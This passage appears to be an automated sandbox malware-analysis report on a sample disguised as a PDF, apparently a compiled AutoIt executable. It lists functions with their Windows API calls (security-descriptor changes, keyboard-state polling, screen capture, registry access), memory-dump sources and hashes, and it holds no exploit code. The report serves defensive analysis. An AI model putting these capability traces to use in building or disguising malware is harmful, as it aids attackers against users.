                                                                            • Part of subcall function 00B3874A: GetProcessHeap.KERNEL32(00000008,?,?,00B3822A,?,?,?), ref: 00B3877F
                                                                            • Part of subcall function 00B3874A: HeapAlloc.KERNEL32(00000000,?,00B3822A,?,?,?), ref: 00B38786
                                                                            • Part of subcall function 00B3874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B3879D
                                                                            • Part of subcall function 00B387E7: GetProcessHeap.KERNEL32(00000008,00B38240,00000000,00000000,?,00B38240,?), ref: 00B387F3
                                                                            • Part of subcall function 00B387E7: HeapAlloc.KERNEL32(00000000,?,00B38240,?), ref: 00B387FA
                                                                            • Part of subcall function 00B387E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B38240,?), ref: 00B3880B
                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B38458
                                                                          • _memset.LIBCMT ref: 00B3846D
                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B3848C
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00B3849D
                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00B384DA
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B384F6
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00B38513
                                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B38522
                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00B38529
                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B3854A
                                                                          • CopySid.ADVAPI32(00000000), ref: 00B38551
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B38582
                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B385A8
                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B385BC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                          • String ID:
                                                                          • API String ID: 3996160137-0
                                                                          • Opcode ID: 51ced4be23ec7c33e7195457788d5e83b2fe60b6a1653e0a471e782c9487fe1d
                                                                          • Instruction ID: 46d01044c4688ec94a68d460ea3c8e420f53af304216ac5867fece7dca92be30
                                                                          • Opcode Fuzzy Hash: 51ced4be23ec7c33e7195457788d5e83b2fe60b6a1653e0a471e782c9487fe1d
                                                                          • Instruction Fuzzy Hash: 6C61567190020AEBDF01DFA5EC45AAEBBB9FF04300F2481A9F915A7291DF759A04CF61
                                                                          Function 00B5762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDC.USER32(00000000), ref: 00B576A2
                                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00B576AE
                                                                          • CreateCompatibleDC.GDI32(?), ref: 00B576BA
                                                                          • SelectObject.GDI32(00000000,?), ref: 00B576C7
                                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00B5771B
                                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00B57757
                                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00B5777B
                                                                          • SelectObject.GDI32(00000006,?), ref: 00B57783
                                                                          • DeleteObject.GDI32(?), ref: 00B5778C
                                                                          • DeleteDC.GDI32(00000006), ref: 00B57793
                                                                          • ReleaseDC.USER32(00000000,?), ref: 00B5779E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                          • String ID: (
                                                                          • API String ID: 2598888154-3887548279
                                                                          • Opcode ID: 8f05c94a4986620241facfee7da533e122406e2f586a241c9e98207bb012be10
                                                                          • Instruction ID: 653d1bf1a5bd82e94d5c7927714e1fb737aa8e8e0151a0b487a822548d6d3e06
                                                                          • Opcode Fuzzy Hash: 8f05c94a4986620241facfee7da533e122406e2f586a241c9e98207bb012be10
                                                                          • Instruction Fuzzy Hash: 87515875A04209EFCB15CFA8EC84EAEBBF9EF48310F148469E94997250DA75A844CB60
                                                                          Function 00B4A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadStringW.USER32(00000066,?,00000FFF,00B6FB78), ref: 00B4A0FC
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 00B4A11E
                                                                          • __swprintf.LIBCMT ref: 00B4A177
                                                                          • __swprintf.LIBCMT ref: 00B4A190
                                                                          • _wprintf.LIBCMT ref: 00B4A246
                                                                          • _wprintf.LIBCMT ref: 00B4A264
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                          • API String ID: 311963372-2391861430
                                                                          • Opcode ID: dc2a504c7304f1deaf1a4be5b1258bac54c8beb28c6aabe2e17f6b0643b28e8f
                                                                          • Instruction ID: 93d2acd1e97d0a1290eed03e0407528e003b5790a00cb6fbee6d9733262ca7ad
                                                                          • Opcode Fuzzy Hash: dc2a504c7304f1deaf1a4be5b1258bac54c8beb28c6aabe2e17f6b0643b28e8f
                                                                          • Instruction Fuzzy Hash: FA518D7190024AAACF15EBE0CE86EEEB7B8EF04300F2441A5F505730A1EB716F58DB61
                                                                          Function 00AE6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B00B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00AE6C6C,?,00008000), ref: 00B00BB7
                                                                            • Part of subcall function 00AE48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AE48A1,?,?,00AE37C0,?), ref: 00AE48CE
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00AE6D0D
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE6E5A
                                                                            • Part of subcall function 00AE59CD: _wcscpy.LIBCMT ref: 00AE5A05
                                                                            • Part of subcall function 00B0387D: _iswctype.LIBCMT ref: 00B03885
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                          • API String ID: 537147316-1018226102
                                                                          • Opcode ID: 416d61a8eb105dba041d0c819c1e2b2d17344b00a41ae66364d0de2efa32f7ed
                                                                          • Instruction ID: 3308e4a40d3f0e281909afb88885722cd6bec210d5db53f0a28ecc8fc415ca11
                                                                          • Opcode Fuzzy Hash: 416d61a8eb105dba041d0c819c1e2b2d17344b00a41ae66364d0de2efa32f7ed
                                                                          • Instruction Fuzzy Hash: 9F02CE305083819FC724EF25C981AAFBBE5FF98354F54096DF896972A1DB30D989CB42
                                                                          Function 00AE45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00AE45F9
                                                                          • GetMenuItemCount.USER32(00BA6890), ref: 00B1D7CD
                                                                          • GetMenuItemCount.USER32(00BA6890), ref: 00B1D87D
                                                                          • GetCursorPos.USER32(?), ref: 00B1D8C1
                                                                          • SetForegroundWindow.USER32(00000000), ref: 00B1D8CA
                                                                          • TrackPopupMenuEx.USER32(00BA6890,00000000,?,00000000,00000000,00000000), ref: 00B1D8DD
                                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B1D8E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                          • String ID:
                                                                          • API String ID: 2751501086-0
                                                                          • Opcode ID: 9666ebae6ad38066ad1cd6f0987f182c17d513dcbe86f0112bfdbc522cd056ed
                                                                          • Instruction ID: af318184815dcbb1c065a4341543fcbb0540924e9d6dc209e9ddbf1c36333128
                                                                          • Opcode Fuzzy Hash: 9666ebae6ad38066ad1cd6f0987f182c17d513dcbe86f0112bfdbc522cd056ed
                                                                          • Instruction Fuzzy Hash: B5712570600246BEEB219F15DC89FEABFA8FF05368F200256F515A61E0CBB15C50DB94
                                                                          Function 00B610A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B60038,?,?), ref: 00B610BC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharUpper
                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                          • API String ID: 3964851224-909552448
                                                                          • Opcode ID: 54e89b3379a147e83966a4ce23a40bf368874393d2e3174ac493a53353d6c177
                                                                          • Instruction ID: 28701e910e88c46e48df02b0017a4dacc803137b489462ad2d6292fe720971ef
                                                                          • Opcode Fuzzy Hash: 54e89b3379a147e83966a4ce23a40bf368874393d2e3174ac493a53353d6c177
                                                                          • Instruction Fuzzy Hash: DE41713112424A9BCF10EF94ED91AEE37A4FF26340F1449E4FD916B291DB34AD1AC760
                                                                          Function 00B45569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
                                                                            • Part of subcall function 00AE7A84: _memmove.LIBCMT ref: 00AE7B0D
                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B455D2
                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B455E8
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B455F9
                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B4560B
                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B4561C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: SendString$_memmove
                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                          • API String ID: 2279737902-1007645807
                                                                          • Opcode ID: 3c80cf7854d7d8bfaf18c691972dc0990deeb5fbc49981e2755a4fc64ebd93be
                                                                          • Instruction ID: 50cc65b741b8e860920af01639df4eb03b5253a27f087f50f771e1a26f09f482
                                                                          • Opcode Fuzzy Hash: 3c80cf7854d7d8bfaf18c691972dc0990deeb5fbc49981e2755a4fc64ebd93be
                                                                          • Instruction Fuzzy Hash: E51194209545A97ADB20B762DC9ADFF7BBCEF95B40F4004B9B405A30E2DEA01E05C5E5
                                                                          Function 00B448F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                          • String ID: 0.0.0.0
                                                                          • API String ID: 208665112-3771769585
                                                                          • Opcode ID: d41a93fbc553ceec9a2f0e5aab85d97d04e9bb6c28275970c516633c5269ecbf
                                                                          • Instruction ID: f37ff7adc84fc1bcb85005cedd764d7119def1df17f1cb0e3170b3e43feb0dd5
                                                                          • Opcode Fuzzy Hash: d41a93fbc553ceec9a2f0e5aab85d97d04e9bb6c28275970c516633c5269ecbf
                                                                          • Instruction Fuzzy Hash: CC11C03190811AAFCB24EB24AC4AEEB7BECDF40710F0401F6F444970E1EFB49A95A661
                                                                          Function 00B45217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • timeGetTime.WINMM ref: 00B4521C
                                                                            • Part of subcall function 00B00719: timeGetTime.WINMM(?,75C0B400,00AF0FF9), ref: 00B0071D
                                                                          • Sleep.KERNEL32(0000000A), ref: 00B45248
                                                                          • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00B4526C
                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B4528E
                                                                          • SetActiveWindow.USER32 ref: 00B452AD
                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B452BB
                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B452DA
                                                                          • Sleep.KERNEL32(000000FA), ref: 00B452E5
                                                                          • IsWindow.USER32 ref: 00B452F1
                                                                          • EndDialog.USER32(00000000), ref: 00B45302
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                          • String ID: BUTTON
                                                                          • API String ID: 1194449130-3405671355
                                                                          • Opcode ID: 6a998c0f9dc22bf505fbb3e10dc519cd9820e3583e9f36c5ca3239ad02751971
                                                                          • Instruction ID: a91486e7c81705cc70ae12d283394822186429201837430edf9477308625ae86
                                                                          • Opcode Fuzzy Hash: 6a998c0f9dc22bf505fbb3e10dc519cd9820e3583e9f36c5ca3239ad02751971
                                                                          • Instruction Fuzzy Hash: 9A218370148B05AFE7116F60FC9AB353BA9E756786B0414AAF102931B2CFA55E00EA71
                                                                          Function 00B4D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                          • CoInitialize.OLE32(00000000), ref: 00B4D855
                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B4D8E8
                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 00B4D8FC
                                                                          • CoCreateInstance.OLE32(00B72D7C,00000000,00000001,00B9A89C,?), ref: 00B4D948
                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B4D9B7
                                                                          • CoTaskMemFree.OLE32(?,?), ref: 00B4DA0F
                                                                          • _memset.LIBCMT ref: 00B4DA4C
                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00B4DA88
                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B4DAAB
                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00B4DAB2
                                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00B4DAE9
                                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 00B4DAEB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                          • String ID:
                                                                          • API String ID: 1246142700-0
                                                                          • Opcode ID: 2ade974b1918976fb07034cebd10bdb016dadaaa0a1f16bdb6f80a5acf1ce111
                                                                          • Instruction ID: f6ecca836456891bdc2a39ae10761f833640101d63baeb350e5ad03f14243176
                                                                          • Opcode Fuzzy Hash: 2ade974b1918976fb07034cebd10bdb016dadaaa0a1f16bdb6f80a5acf1ce111
                                                                          • Instruction Fuzzy Hash: 59B1FE75A00209AFDB04DFA5D988DAEBBF9FF48314B1484A9F505EB261DB30EE45CB50
                                                                          Function 00B4052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 00B405A7
                                                                          • SetKeyboardState.USER32(?), ref: 00B40612
                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00B40632
                                                                          • GetKeyState.USER32(000000A0), ref: 00B40649
                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00B40678
                                                                          • GetKeyState.USER32(000000A1), ref: 00B40689
                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00B406B5
                                                                          • GetKeyState.USER32(00000011), ref: 00B406C3
                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00B406EC
                                                                          • GetKeyState.USER32(00000012), ref: 00B406FA
                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00B40723
                                                                          • GetKeyState.USER32(0000005B), ref: 00B40731
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: ecc64ad2e6ebac8b6c75e32ad51054945f90eeff9b5faefc797b03095e703e92
                                                                          • Instruction ID: e7e160d154fab40a80b644e17d48237f469da4407c1e15070ff2a1a1f512500d
                                                                          • Opcode Fuzzy Hash: ecc64ad2e6ebac8b6c75e32ad51054945f90eeff9b5faefc797b03095e703e92
                                                                          • Instruction Fuzzy Hash: 2D51C820A1478429FB35FBA484557EABFF4DF11380F0849D9DAC2571C2DA749B8CDB52
                                                                          Function 00B3C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,00000001), ref: 00B3C746
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00B3C758
                                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00B3C7B6
                                                                          • GetDlgItem.USER32(?,00000002), ref: 00B3C7C1
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00B3C7D3
                                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00B3C827
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00B3C835
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00B3C846
                                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00B3C889
                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00B3C897
                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B3C8B4
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00B3C8C1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                          • String ID:
                                                                          • API String ID: 3096461208-0
                                                                          • Opcode ID: 213338ef6574a00a078333bb4607fe979fb7d5cc3f670e4187f68ecf403e24ec
                                                                          • Instruction ID: bcf73902404cf128f15af1099a18760003c45e8da87314323ea170e8d54d29f1
                                                                          • Opcode Fuzzy Hash: 213338ef6574a00a078333bb4607fe979fb7d5cc3f670e4187f68ecf403e24ec
                                                                          • Instruction Fuzzy Hash: BD512171B00205ABDB18CFA9DD95ABEBBB6EB88311F14816DF515E72D0DBB49D00CB50
                                                                          Function 00AE201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AE2036,?,00000000,?,?,?,?,00AE16CB,00000000,?), ref: 00AE1B9A
